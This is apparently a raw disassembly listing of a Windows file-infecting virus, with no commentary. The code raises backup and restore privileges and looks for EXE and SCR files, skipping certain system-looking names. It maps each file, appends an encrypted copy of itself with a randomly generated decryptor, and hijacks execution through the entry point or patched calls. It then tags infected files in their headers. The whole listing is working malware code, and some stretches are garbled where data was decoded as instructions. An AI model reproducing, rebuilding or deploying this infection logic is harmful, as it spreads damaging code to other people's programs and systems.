call sub_42B6FB
call sub_42B76D
loc_42BD51: ; CODE XREF: .rsrc:0042BD45�j
call sub_42B727
call sub_42B76D
loc_42BD5B: ; CODE XREF: .rsrc:0042BD2D�j
; .rsrc:0042BD39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_42BD6F
mov al, 0C9h
stosb
call sub_42B76D
loc_42BD6F: ; CODE XREF: .rsrc:0042BD65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_42BDA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_42B76D
mov al, 61h
stosb
call sub_42B76D
loc_42BDA5: ; CODE XREF: .rsrc:0042BD79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_42B76D
test dword ptr [ebp+1039C0h], 20h
jz short loc_42BE31
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_42BDED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_42B7DF
call sub_42B76D
mov al, 0C3h
stosb
call sub_42B76D
loc_42BDED: ; CODE XREF: .rsrc:0042BDCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_42B76D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_42BE20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_42BE2A
; ---------------------------------------------------------------------------
loc_42BE20: ; CODE XREF: .rsrc:0042BE12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_42BE2A: ; CODE XREF: .rsrc:0042BE1E�j
stosw
call sub_42B76D
loc_42BE31: ; CODE XREF: .rsrc:0042BDC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_42BE9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_42BE66
lea eax, [ebp+1039B8h]
loc_42BE5E: ; CODE XREF: .rsrc:0042BE64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_42BE5E
loc_42BE66: ; CODE XREF: .rsrc:0042BE56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_42BE7B
mov ax, 0C031h
stosw
loc_42BE7B: ; CODE XREF: .rsrc:0042BE73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_42BE94
mov ax, 0C031h
stosw
loc_42BE94: ; CODE XREF: .rsrc:0042BE8C�j
mov al, 0C3h
stosb
call sub_42B76D
loc_42BE9C: ; CODE XREF: .rsrc:0042BE3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_42BEB4
push edi
sub edi, eax
pop eax
jmp short loc_42BECD
; ---------------------------------------------------------------------------
loc_42BEB4: ; CODE XREF: .rsrc:0042BEAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_42BECD: ; CODE XREF: .rsrc:0042BEB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_42BEED
neg eax
loc_42BEED: ; CODE XREF: .rsrc:0042BEE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_42BEF1 proc near ; CODE XREF: sub_42C45B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_42C0D9
call near ptr loc_42BF11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_42BF11: ; CODE XREF: sub_42BEF1+F�p
add bh, bh
sub_42BEF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_42B414
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_42B414
mov edi, [ebp+1042F4h]
push esi
call sub_42B414
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_42C0D9
jz loc_42C0D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_42C0AA
loc_42BF8B: ; CODE XREF: sub_42C0AA+29�j
lodsb
cmp al, 0E8h
jnz loc_42C036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call sub_42B414
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_42BFB9
cmp eax, [edi+0Ch]
jnb loc_42C0D2
jmp short loc_42BFC5
; ---------------------------------------------------------------------------
loc_42BFB9: ; CODE XREF: sub_42C0AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_42C0D2
loc_42BFC5: ; CODE XREF: sub_42C0AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_42C0D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_42B414
cmp [ebp+1042F4h], edi
jnz loc_42C0D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_42C0D2
cmp eax, [edi+8]
jnb loc_42C0D2
loc_42C00E: ; CODE XREF: sub_42C0AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_42C0E8
jmp loc_42C0D2
; ---------------------------------------------------------------------------
loc_42C036: ; CODE XREF: sub_42C0AA-11C�j
cmp al, 0FFh
jnz loc_42C0D2
cmp byte ptr [esi], 15h
jnz loc_42C0D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_42B414
cmp [ebp+1042F4h], edi
jnz short loc_42C0D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_42C07F
cmp eax, [ebp+10431Ch]
jb short loc_42C0E8
loc_42C07F: ; CODE XREF: sub_42C0AA-35�j
cmp eax, 70000000h
jb short loc_42C0BD
call sub_42C0AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_42C0A9
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_42C0C4
; ---------------------------------------------------------------------------
locret_42C0A9: ; CODE XREF: sub_42C0AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_42C0AA
; =============== S U B R O U T I N E =======================================
sub_42C0AA proc near ; CODE XREF: sub_42C0AA-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 0042BF8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call sub_42B51B
popa
loc_42C0BD: ; CODE XREF: sub_42C0AA-26�j
test eax, 80000000h
jnz short loc_42C0D2
loc_42C0C4: ; CODE XREF: sub_42C0AA-3�j
sub eax, [edi+0Ch]
jb short loc_42C0D2
cmp eax, [edi+8]
jb loc_42C00E
loc_42C0D2: ; CODE XREF: sub_42C0AA-F9�j
; sub_42C0AA-EB�j ...
dec ecx
jnz loc_42BF8B
loc_42C0D9: ; CODE XREF: sub_42BEF1+9�j
; .rsrc:0042BF73�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_42C12A
; ---------------------------------------------------------------------------
loc_42C0E8: ; CODE XREF: sub_42C0AA-7F�j
; sub_42C0AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_42C12A: ; CODE XREF: sub_42C0AA+3C�j
pop edi
pop esi
retn
sub_42C0AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42C12D proc near ; CODE XREF: .rsrc:0042C42E�p
; FUNCTION CHUNK AT 0042C257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_42C257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_42C257
call sub_42A5AF
call near ptr loc_42C168+5
push ebx
db 65h
jz short near ptr unk_42C1A6
imul ebp, [ebp+53h], 72756365h
loc_42C168: ; CODE XREF: sub_42C12D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_42C12D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_42C19C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_42C203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_42C19C: ; CODE XREF: .rsrc:0042C17F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ; è
db 13h
db 0
unk_42C1A6 db 0 ; CODE XREF: sub_42C12D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0Bh
db 0E8h ; è
db 0FFh
db 0FFh
db 0E8h ; è
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0EEh ; î
db 0E7h ; ç
db 0FFh
db 0FFh
db 0E8h ; è
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0CBh ; Ë
db 0E7h ; ç
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_42C203: ; CODE XREF: .rsrc:0042C18D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_42C12D
loc_42C257: ; CODE XREF: sub_42C12D+A�j
; sub_42C12D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_42C12D
; =============== S U B R O U T I N E =======================================
sub_42C259 proc near ; CODE XREF: .rsrc:0042C427�p
; .rsrc:0042C433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_42C32A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_42C32A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_42C8AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_42C89F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_42C89F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_42C89F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_42C877
mov [ebp+1042B4h], eax
locret_42C32A: ; CODE XREF: sub_42C259+10�j
; sub_42C259+27�j ...
retn
sub_42C259 endp
; ---------------------------------------------------------------------------
loc_42C32B: ; CODE XREF: sub_42C45B+188�p
; sub_42C45B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ; ÷
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_42C370 proc near ; CODE XREF: sub_42C45B:loc_42C4D0�p
; sub_42C45B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_42C375: ; CODE XREF: sub_42C370+23�j
jecxz short locret_42C3AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_42C3AC
cmp dword ptr [edx+0Ch], 1
jb short loc_42C375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_42C3AC: ; CODE XREF: sub_42C370:loc_42C375�j
; sub_42C370+1D�j ...
retn
sub_42C370 endp
; =============== S U B R O U T I N E =======================================
sub_42C3AD proc near ; CODE XREF: .rsrc:0042C445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_42C3AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42C3BA: ; CODE XREF: .rsrc:0042C3DB�j
mov ecx, edi
jmp short loc_42C3C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_42C3C5: ; CODE XREF: .rsrc:0042C3D7�j
mov ebx, edi
xor ecx, ecx
loc_42C3C9: ; CODE XREF: .rsrc:0042C3BC�j
; .rsrc:0042C3DF�j
lodsb
cmp al, 61h
jb short loc_42C3D4
cmp al, 7Ah
ja short loc_42C3D4
sub al, 20h
loc_42C3D4: ; CODE XREF: .rsrc:0042C3CC�j
; .rsrc:0042C3D0�j
stosb
cmp al, 5Ch
jz short loc_42C3C5
cmp al, 2Eh
jz short loc_42C3BA
cmp al, 0
jnz short loc_42C3C9
jecxz short locret_42C3AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_42C3F7
cmp eax, 524353h
jnz locret_42C32A
loc_42C3F7: ; CODE XREF: .rsrc:0042C3EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_42C32A
cmp eax, 4E554357h
jz locret_42C32A
cmp eax, 32334357h
jz locret_42C32A
cmp eax, 4F545350h
jz locret_42C32A
xor ebx, ebx
call sub_42C259
jnz short loc_42C43E
call sub_42C12D
call sub_42C259
jz locret_42C32A
loc_42C43E: ; CODE XREF: .rsrc:0042C42C�j
xor edx, edx
call sub_42C45B
call sub_42C3AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_42C855
; =============== S U B R O U T I N E =======================================
sub_42C45B proc near ; CODE XREF: .rsrc:0042C440�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_42C855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_42C855
test dword ptr [ebx+16h], 2000h
jnz loc_42C855
test byte ptr [ebx+5Ch], 2
jz loc_42C855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_42C855
cmp eax, 20202020h
jz loc_42C855
mov ecx, [ebx+0C8h]
jecxz short loc_42C4D0
push ecx
call sub_42B414
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_42C4D0: ; CODE XREF: sub_42C45B+5D�j
call sub_42C370
jb loc_42C855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_42C4F0
xor eax, eax
jmp short loc_42C4F5
; ---------------------------------------------------------------------------
loc_42C4F0: ; CODE XREF: sub_42C45B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_42C4F5: ; CODE XREF: sub_42C45B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_42AB50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_42C517: ; CODE XREF: sub_42C45B+D5�j
push 20h
dec cl
pop eax
js short loc_42C532
call near ptr dword_42AB50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_42C517
; ---------------------------------------------------------------------------
loc_42C532: ; CODE XREF: sub_42C45B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_42C560
test dword ptr [ebp+1039C0h], 3
jnz short loc_42C556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_42C560
; ---------------------------------------------------------------------------
loc_42C556: ; CODE XREF: sub_42C45B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_42C560: ; CODE XREF: sub_42C45B+E1�j
; sub_42C45B+F9�j ...
push 6
pop ecx
loc_42C566: ; CODE XREF: sub_42C45B+129�j
push 6
pop eax
call near ptr dword_42AB50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_42C566
test dword ptr [ebp+1039C0h], 8
jnz short loc_42C59B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_42C560
loc_42C59B: ; CODE XREF: sub_42C45B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_42C5C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_42C560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_42C560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_42C560
loc_42C5C2: ; CODE XREF: sub_42C45B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_42C5D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_42C560
loc_42C5D7: ; CODE XREF: sub_42C45B+171�j
and dword ptr [ebp+104300h], 0
call loc_42B855
call loc_42C32B
call sub_42C85E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_42C259
jz loc_42C855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_42C370
jb loc_42C855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_42C64B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_42C64B: ; CODE XREF: sub_42C45B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_42C65F
rep movsb
loc_42C65F: ; CODE XREF: sub_42C45B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_42C71D
push dword ptr [ebx+28h]
call sub_42B414
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_42C71D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_42C69C
xor ecx, ecx
loc_42C69C: ; CODE XREF: sub_42C45B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_42C703
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_42C6DC
neg dword ptr [eax]
loc_42C6DC: ; CODE XREF: sub_42C45B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_42C6FA
neg dword ptr [eax]
loc_42C6FA: ; CODE XREF: sub_42C45B+29B�j
push ecx
call loc_42C32B
pop ecx
jmp short loc_42C70F
; ---------------------------------------------------------------------------
loc_42C703: ; CODE XREF: sub_42C45B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_42C70F: ; CODE XREF: sub_42C45B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_42C71D: ; CODE XREF: sub_42C45B+20E�j
; sub_42C45B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_42C736
imul edx, 12345678h
loc_42C736: ; CODE XREF: sub_42C45B+2D3�j
mov [eax-19h], dx
call sub_42A120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_42C768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_42C768: ; CODE XREF: sub_42C45B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_42C784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_42C784: ; CODE XREF: sub_42C45B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_42C797
push edx
call sub_42BEF1
pop edx
loc_42C797: ; CODE XREF: sub_42C45B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_42C7A4
mov [ebx+28h], ecx
jmp short loc_42C7B1
; ---------------------------------------------------------------------------
loc_42C7A4: ; CODE XREF: sub_42C45B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_42C7AE
jmp short loc_42C7B1
; ---------------------------------------------------------------------------
loc_42C7AE: ; CODE XREF: sub_42C45B+34F�j
mov ecx, [ebx+28h]
loc_42C7B1: ; CODE XREF: sub_42C45B+347�j
; sub_42C45B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_42C7D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_42C7D1: ; CODE XREF: sub_42C45B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_42C7E2
mov [edx+8], ecx
loc_42C7E2: ; CODE XREF: sub_42C45B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_42C813
add ecx, [ebp+101069h]
loc_42C813: ; CODE XREF: sub_42C45B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_42C835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_42C835
mov dh, [ebp+1039BFh]
loc_42C835: ; CODE XREF: sub_42C45B+3C4�j
; sub_42C45B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_42C84C
loc_42C841: ; CODE XREF: sub_42C45B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_42C841
jmp short loc_42C855
; ---------------------------------------------------------------------------
loc_42C84C: ; CODE XREF: sub_42C45B+3E4�j
; sub_42C45B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_42C84C
loc_42C855: ; CODE XREF: .rsrc:0042C456�j
; sub_42C45B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_42C45B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42C85E proc near ; CODE XREF: sub_42C45B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_42C32A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_42C877: ; CODE XREF: sub_42C259+C5�j
push dword ptr [ebp+1042B0h]
call dword ptr [ebp+103E62h]
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EE2h]
loc_42C89F: ; CODE XREF: sub_42C259+6B�j
; sub_42C259+82�j ...
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E62h]
loc_42C8AB: ; CODE XREF: sub_42C259+45�j
lea esi, [ebp+104184h]
push dword ptr [ebp+104294h]
push esi
call dword ptr [ebp+103EDEh]
and dword ptr [ebp+104298h], 0
retn
sub_42C85E endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038CBh, 0C10FF058h, 10158885h
dd 0C3C08500h, 0F0FFC883h, 8885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104184B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F2E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 0A2ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 5030702h, 24960601h
dd 0ACB1447Eh, 145A49E8h, 0FF8B8B00h, 570E860h, 4CEB0000h
dd 3 dup(0)
db 87h, 0DBh
db 90h
align 4
dd 6 dup(0)
dd 27000h, 8 dup(0)
; ---------------------------------------------------------------------------
mov ebx, offset dword_4439A4
add ebx, ebp
sub ebx, dword ptr ss:byte_4439D5[ebp]
cmp ss:dword_444804[ebp], 0
mov ss:dword_444804[ebp], ebx
jnz near ptr word_42CEA6
lea eax, dword_44480C[ebp]
push eax
call dword ptr ss:(loc_444917+1)[ebp]
mov ss:dword_444808[ebp], eax
mov edi, eax
lea ebx, byte_444819[ebp]
push ebx
push eax
call dword ptr ss:(loc_444913+1)[ebp]
mov ss:dword_4439E1[ebp], eax
lea ebx, word_444826[ebp]
push ebx
push edi
call dword ptr ss:(loc_444913+1)[ebp]
mov ss:dword_4439E5[ebp], eax
lea eax, dword_443B72[ebp]
jmp eax
; ---------------------------------------------------------------------------
align 4
dd 40000000h, 3 dup(0)
dd 2600000h, 121900h, 2 dup(0)
dd 100000h, 6E8800h, 1A00000h, 9800h, 0EAh dup(0)
dd 9B470000h, 8AD7C80h, 3317C83h, 7C91h, 0Dh dup(0)
db 2 dup(0)
word_42CEA6 dw 0 ; CODE XREF: .rsrc:0042CA3A�j
dd 118h dup(0)
dd 7C800000h, 133Dh dup(0)
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_43204D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_432041
mov ebx, [eax+29C1h]
jmp short loc_43204B
; ---------------------------------------------------------------------------
loc_432041: ; CODE XREF: .rsrc:00432037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_43204B: ; CODE XREF: .rsrc:0043203F�j
mov ebx, [ebx]
loc_43204D: ; CODE XREF: .rsrc:0043201F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 0B004h
sub ebp, 101005h
mov edi, [esp+4]
